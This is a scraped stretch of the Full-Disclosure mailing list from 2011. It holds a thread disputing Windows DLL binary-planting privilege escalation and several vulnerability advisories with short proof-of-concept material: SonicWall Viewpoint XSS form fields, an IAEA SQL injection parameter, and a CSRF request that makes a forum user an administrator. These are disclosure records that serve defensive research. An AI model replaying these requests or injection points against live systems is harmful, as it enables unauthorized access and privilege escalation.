waste of your times. But... keep on going, maybe MS will send you another 'thankyou' email ;) xd / http://crazycoders.comcrazycoders.com / #haxnet@Ef On 26 September 2011 10:52, Thor (Hammer of God) t...@hammerofgod.comwrote: Maybe he can trick the user into installing on a FAT32 partition first, and THEN get the to execute from a remote share! On Sep 25, 2011, at 5:30 PM, Travis Biehn tbi...@gmail.com wrote: It might be a fun experiment to see what DLLs they're looking for :.) -Travis On Sun, Sep 25, 2011 at 2:57 PM, kz2...@googlemail.com wrote: To replace a service executable you usually need administrator access anyway. --Original Message-- From: Madhur Ahuja Sender: ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Privilege escalation on Windows using Binary Planting
I agree. I am only talking of the scenario where this service is pre-installed. But before it was all about 3rd party addons wich run as a service... it is not happening, i can tell u this from many yrs of exp with windows, it wont happen. MS will not rewrite sdks,ddks,its whole stdafx/msdn architecture for coding, because of 3rd party addons.. cheers. xd On 26 September 2011 11:41, Madhur Ahuja ahuja.mad...@gmail.com wrote: I agree. I am only talking of the scenario where this service is pre-installed. On Monday, September 26, 2011, Thor (Hammer of God) wrote: You'd have to be admin to install as a service, and the service would obviously need to then be running as local system to be of benefit (beyond what a normal user could do anyway) AND the installer would have to grant a normal user rights to overwrite it. Certainly possible, but the developer would have to go out of their way to screw that up. And if they did, it still wouldn't be because of the OS... T On Sep 25, 2011, at 6:18 PM, Travis Biehn tbi...@gmail.com wrote: GloW: there's a lot of 3rd party software that installs itself as windows services. -Travis On Sun, Sep 25, 2011 at 9:15 PM, GloW - XD doo...@gmail.com wrote: Haha , too good and too true thor ! Maybe he can trick the user into installing on a FAT32 partition first, and THEN get the to execute from a remote share! Rofl x10. Agreed , this kind of attack, is NOT deasible in 2011, try maybe, 2006. Anyhow it has been a pleasure, ending this BS i think once and for all, lookup how winlogon works for one thing, then look at how windows creates and maintains a service_table, and then at the dlls, wich are protected ofc, you cannot touch msgina.dll,without ALOT of help from a rootkit or something similar, in wich case, why would you need to ? You could add an admin, hidden, and in simple batfile script (yes i do have my own code but no it is not for kids..), this is 10seconds and hidden, so when you have gotten that far, why would you bother to hijack a dll ? You CANNOT do crap,without complete ADMIN not SYSTEm, ADMIN$ share, and total axcs to all sockets, meaning, all pipe control and thats where half of windows exchanges smb shares for one thing, you guys dont seem to know CRAP about windows to start with, then have the gall to raise such a frigging ridiculous topic about a non happening, YOUTUBE ONE 'real' event, of this being useful, or, even just working, and i would look but, you wont, cannot, and will never be able to, especially on newer systems of windows7-8. As i said earlier, enjoy your bs DFLL hijacking, but ms, dont care for it, and whatever patches they instilled, dont touch even service_table.. so, they have not given it a high prio,and why shuld they. This is simply a case of a secteam gaining notoriety, to try and make this a 'big bug!!' , to try and gain brownie points from MS. Even tho, i dont believe in many things MS, I know windows system, and how to break it, better than many people, and i can tell you now, this whole DLL hijack, is a complete and utter waste of your times. But... keep on going, maybe MS will send you another 'thankyou' email ;) xd / http://crazycoders.comcrazycoders.com / #haxnet@Ef On 26 September 2011 10:52, Thor (Hammer of God) t...@hammerofgod.comwrote: Maybe he can trick the user into installing on a FAT32 partition first, and THEN get the to execute from a remote share! On Sep 25, 2011, at 5:30 PM, Travis Biehn tbi...@gmail.com wrote: It might be a fun experiment to see what DLLs they're looking for :.) -Travis On Sun, Sep 25, 2011 at 2:57 PM, kz2...@googlemail.com wrote: To replace a service executable you usually need administrator access anyway. --Original Message-- From: Madhur Ahuja Sender: ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] Upek Protector Suite QL 2011 - VTP Buffer Overflow Vulnerability
Title: == Upek Protector Suite QL 2011 - Buffer Overflow Vulnerability Date: = 2011-09-26 References: === http://www.vulnerability-lab.com/get_content.php?id=259 VL-ID: = 259 Abstract: = The Vulnerability Lab Research Team discovered a Buffer Overflow Vulnerability on the UPEK Protector Suite QL in combination with the eikon fingerprint scanner device. Report-Timeline: 2011-04-03: Vendor Notification 2011-04-19: Vendor Notification 2011-**-**: Vendor Response/Feedback 2011-**-**: Vendor Fix/Patch 2011-09-24: Public or Non-Public Disclosure Status: Published Affected Products: == Upek Protector Suite QL 2011 Upek Protector Suite QL 5.x Exploitation-Technique: === Local Severity: = High Details: A Buffer Overflow vulnerability is detected on the UPEK Protector Suite QL v5.x version 2011 in combination with the EikonTouch USB peripheral. The vulnerability allows an local attacker to crash the EikonTouch USB peripheral device driver/software via local buffer overflow. The bug is located on the profile import module of the software when processing special crafted (manipualted) .vtp profile files. Vulnerable Module(s): [+] .VTP FILE - USERNAME Note: After the software crash the driver device of the fingerprinter crashs too. All control center functions are stable unavailable. Analyse(s): ../FingerprintSensorVersion.txt ../Report.wer ../upeksvr.exe_b0585871d7999ad31630447670a0d1d084e7436_1331e935.wer ../WERC0A1.tmp.appcompat.txt ../WERC1E9.tmp.WERInternalMetadata.xml ../WERC1FA.tmp.WERDataCollectionFailure.txt ../AppCrash_ctlcntrv.exe_f93f6c2a8899fbd4ca04bd90d32dae3d4dbe7_13bce09e Picture(s): ../1.png ../2.png ../3.png ../4.png ../5.png ../6.png ../7.png ../2011_1.png ../2011_2.png ../IMAG0267.jpg ../IMAG0268.jpg ../IMAG0270.jpg ../IMAG0272.jpg ../wrong.png Video(s): [+] http://www.vulnerability-lab.com/get_content.php?id=283 Proof of Concept: = This vulnerability can be exploited by local attacker. For demonstration or reproduce ... Review: *.vtp PoC: ../poc.vtp Analyse(s): ../FingerprintSensorVersion.txt ../Report.wer ../upeksvr.exe_b0585871d7999ad31630447670a0d1d084e7436_1331e935.wer ../WERC0A1.tmp.appcompat.txt ../WERC1E9.tmp.WERInternalMetadata.xml ../WERC1FA.tmp.WERDataCollectionFailure.txt ../AppCrash_ctlcntrv.exe_f93f6c2a8899fbd4ca04bd90d32dae3d4dbe7_13bce09e Solution: = Restrict the username to maximum to prevent against buffer overflows when processing large -username .vtp files. Risk: = The security risk of the local buffer overflow vulnerability is estimated as high(-). Credits: Vulnerability Research Laboratory - Benjamin Kunz Mejri (Rem0ve) Disclaimer: === The information provided in this advisory is provided as it is without any warranty. Vulnerability-Lab disclaims all warranties, either expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability- Lab or its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages, even if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply. Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability- Lab. Permission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other media, are reserved by Vulnerability-Lab or its suppliers. Copyright © 2011|Vulnerability-Lab -- Website: www.vulnerability-lab.com ; vuln-lab.com or vuln-db.com Contact: ad...@vulnerability-lab.com or supp...@vulnerability-lab.com ___ Full-Disclosure - We believe in it.
[Full-disclosure] Sonicwall Viewpoint v6.x - Multiple Web Vulnerabilities
Title:
==
Sonicwall Viewpoint v6.x - Multiple Web Vulnerabilities
Date:
=
2011-09-26
References:
===
http://www.vulnerability-lab.com/get_content.php?id=195
VL-ID:
=
195
Introduction:
=
SonicWALL® ViewPoint™ ist ein benutzerfreundliches webbasiertes Reporting-Tool,
das die Sicherheitsprodukte und -dienste
von SonicWALL vollständig unterstützt und erweitert. Es kann flexibel als
Software oder virtuelle Appliance implementiert
werden. Umfassende Reporting-Funktionen geben Administratoren einen
unmittelbaren Einblick in den Zustand, die Leistung und
die Sicherheit ihres Netzwerks. Mithilfe der anpassbaren Übersichtsanzeige und
einer Vielzahl von Verlaufsberichten unterstützt
SonicWALL ViewPoint Unternehmen aller Größen dabei, Netzwerknutzung und
Sicherheitsaktivitäten zu überwachen und die
Webnutzung anzuzeigen.
(Copy of the Vendor Homepage:
http://www.sonicwall.com/de/Centralized_Management_and_Reporting.html)
Abstract:
=
Vulnerability-Lab Team discovered multiple Input Validation Vulnerabilities on
SonicWalls Viewpoint appliance/application.
Report-Timeline:
2011-05-16: Vendor Notification
2011-06-21: Vendor Response/Feedback
2011-**-**: Vendor Fix/Patch
2011-09-26: Public or Non-Public Disclosure
Status:
Published
Affected Products:
==
Sonicwall Viewpoint v6.x older versions
Exploitation-Technique:
===
Remote
Severity:
=
Medium
Details:
1.1
Multiple persistent input validation vulnerabilities are detected on sonicwalls
viewpoint global management application.
The persistent vulnerability allows an local low privileged user account to
manipulate specific application modules or content requests.
Vulnerable Module(s): (Persistent)
[+] SonicWall Training (Titel;
RSS_URL;Logs Mail)
[+] Current Sessions (Titel)
[+] Add Componente
[+] Report Layout / Template
[+] Scheduled Reports
[+] Security Dashboard
[+] Custom Report – Website Filtering
[+] SonicWall Today
[+] SonicToday Pagetitle
[+] SonicToday log title
1.2
Multiple non-persistent input validation vulnerabilities are detected on
sonicwalls viewpoint global management application.
The non persistent vulnerability allows an remote attacker to hijack
customer/admin session with high required user inter action.
Vulnerable Module(s): (Non Persistent)
[+] FTP Usage / Top Users of FTP / Web
Usage Top Sites
[+] Show Logs
[+] Description
[+] Security Dashboard
Picture(s):
../ive1.png
../ive2.png
../ive3.png
Proof of Concept:
=
The vulnerabilities can be exploited by remote attackers or local low
privileged user accounts.
For demonstration or reproduce ...
Section: Top FTP Users
input type=hidden name=reportType value=singleday_report /
input type=hidden name=wrapped value=INSERT YOUR SCRIPTCODE HERE! /
input type=hidden name=updatePerm value=1 /
input type=hidden name=node_id value=UT1258498415223005056BA2A2D /
input type=hidden name=t value=Reports_FTPUsage_ByUser_Snwls /
input type=hidden name=level value=3 /
input type=hidden name=r value=60 /
input type=hidden name=page value=reports/topTenReport.jsp /
input type=hidden name=p value=7640 /
input type=hidden name=action value=showPage /
input type=hidden name=report_id value=180 /
input type=hidden name=help_url
value=http://help.xxx.com/help.asp?l=INSERT YOUR SCRIPTCODE HERE! /
input type=hidden name=unused value=1 /
input type=hidden name=isTimeBasedReport value=0 /
input type=hidden name=bidirection value=0
Section: License Viewpoint
form method=post action=login.jsp
input type=hidden name=login value=1/
input type=hidden name=url value=/stats/pdf?sn=INSERT YOUR SCRIPTCODE
HERE!
input type=hidden name=sn value=INSERT YOUR SCRIPTCODE HERE!/
Username: input type=text name=userNamebr
Password: input type=password name=passwordbr
input type=submit value=Login
/form
createDataBox(unescape(''),'','logs','2','284','5','5','Logsh1INSERT
SCRIPTCODE HERE!','DBC1269337065018005056BA2A2D','0','3','1','null'); -- ;)
References: [x] =
http://viewpoint.xxx.com/sgms/granular_report?action=view_report_actiontemplate_id=100config_id=7config_name=facebooknode_id=UT1258498415223005056BA2A2DsuccessURL=
[Full-disclosure] IAEA Website Service - Blind SQL Injection Vulnerability
Title: == International Atomic Energy Agency - Blind SQL Injection Vulnerability Date: = 2011-09-26 VL-ID: = 268 Reference: == http://www.vulnerability-lab.com/get_content.php?id=268 Introduction: = The IAEA was created in 1957 in response to the deep fears and expectations resulting from the discovery of nuclear energy. Its fortunes are uniquely geared to this controversial technology that can be used either as a weapon or as a practical and useful tool. The Agency s genesis was US President Eisenhower s Atoms for Peace address to the General Assembly of the United Nations on 8 December 1953. These ideas helped to shape the IAEA Statute, which 81 nations unanimously approved in October 1956. The Statute outlines the three pillars of the Agency s work - nuclear verification and security, safety and technology transfer. (Copy of the Vendor Homepage: http://en.wikipedia.org ) Abstract: = An anonymous Vulnerability Laboratory researcher discovered a blind SQL Injection vulnerability on the official International Atomic Energy Agency vendor website. Report-Timeline: 2011-09-06: Vendor Notification 2011-09-23: Vendor Response/Feedback 2011-09-24: Vendor Fix/Patch 2011-09-26: Public or Non-Public Disclosure Status: Published Affected Products: == IAEA Website Service - 2011/Q3 Exploitation-Technique: === Remote Severity: = Critical Details: A SQL Injection Vulnerability is detected on the IAEA vendor website. An unsecure application parameter request allows remote attackers to implement/execute own sql statements via sql-injection. Successful exploitation of the blind injection may result in dbms compromise, defacement or manipulation of service/application content. Vulnerable Module(s): [+] /nael/page.php Vulnerable Para(s): [+] recordID= Picture(s): ../sql_1.png Risk: = The security risk of the blind sql injection vulnerability is estimated as critical. Credits: Vulnerability Research Laboratory - Mohammed A.A () Disclaimer: === The information provided in this advisory is provided as it is without any warranty. Vulnerability-Lab disclaims all warranties, either expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability- Lab or its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages, even if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply. Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability- Lab. Permission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other media, are reserved by Vulnerability-Lab or its suppliers. Copyright © 2011|Vulnerability-Lab -- Website: www.vulnerability-lab.com ; vuln-lab.com or vuln-db.com Contact: ad...@vulnerability-lab.com or supp...@vulnerability-lab.com ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] Advanced Electron Forums (AEF) 1.0.9 = Cross Site Request Forgery (CSRF) Vulnerability
Advanced Electron Forums (AEF) 1.0.9 = Cross Site Request Forgery (CSRF) Vulnerability 1. OVERVIEW The Advanced Electron Forums (AEF) 1.0.9 = versions are vulnerable to Cross Site Request Forgery (CSRF). 2. BACKGROUND AEF has a very simple and easy to use Administration Panel and installing this software is a piece of cake! You can install new themes, customize themes the way you want. The User Control Panel has a simple yet beautiful interface where users can set their preferences for the board. 3. VULNERABILITY DESCRIPTION Advanced Electron Forums (AEF) 1.0.9 = versions contain a flaw that allows a remote Cross-site Request Forgery (CSRF / XSRF) attack. The flaw exists because the application does not require multiple steps or explicit confirmation for sensitive transactions for majority of administrator functions such as adding new user, assigning user to administrative privilege. By using a crafted URL, an attacker may trick the victim into visiting to his web page to take advantage of the trust relationship between the authenticated victim and the application. Such an attack could trick the victim into executing arbitrary commands in the context of their session with the application, without further prompting or verification. 4. VERSIONS AFFECTED 1.0.9 = 5. PROOF-OF-CONCEPT/EXPLOIT The following request ecalates a normal user to an administrator. [REQUEST] POST /aef/index.php?act=editprofileuid=2 HTTP/1.1 username=testeremail=tester%40yehg.netu_member_group=1realname=title=location=gender=1privatetext=icq=yim=msn=aim=www=sig=editprofile=Edit+Profile [/REQUEST] 6. SOLUTION Partial fix is available. The vendor released a single patch for the provided vulnerable EditProfile functionality. http://www.anelectron.com/downloads/index.php?act=downloadattachatid=59 7. VENDOR Electron Inc. http://www.anelectron.com/ 8. CREDIT This vulnerability was discovered by Aung Khant, http://yehg.net, YGN Ethical Hacker Group, Myanmar. 9. DISCLOSURE TIME-LINE 2010-12-14: notified vendor through email, website contact form submission 2011-05-17: vendor released aef 1.0.9 without the CSRF fix 2011-09-06: vendor released separate patch about the CSRF fix 2011-09-26: vulnerability disclosed 10. REFERENCES Original Advisory URL: http://yehg.net/lab/pr0js/advisories/[aef-1.x]_cross_site_request_forgery CSRF Wiki: https://secure.wikimedia.org/wikipedia/en/wiki/Cross-site_request_forgery #yehg [2011-09-26] ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Privilege escalation on Windows using BinaryPlanting
On Mon, 26 Sep 2011 01:36:13 -, Thor (Hammer of God) said: Certainly possible, but the developer would have to go out of their way to screw that up. Yes, but doesn't that sentence describe like 75% of all the CVE's out there? :) pgpLnNoqmv0WQ.pgp Description: PGP signature ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
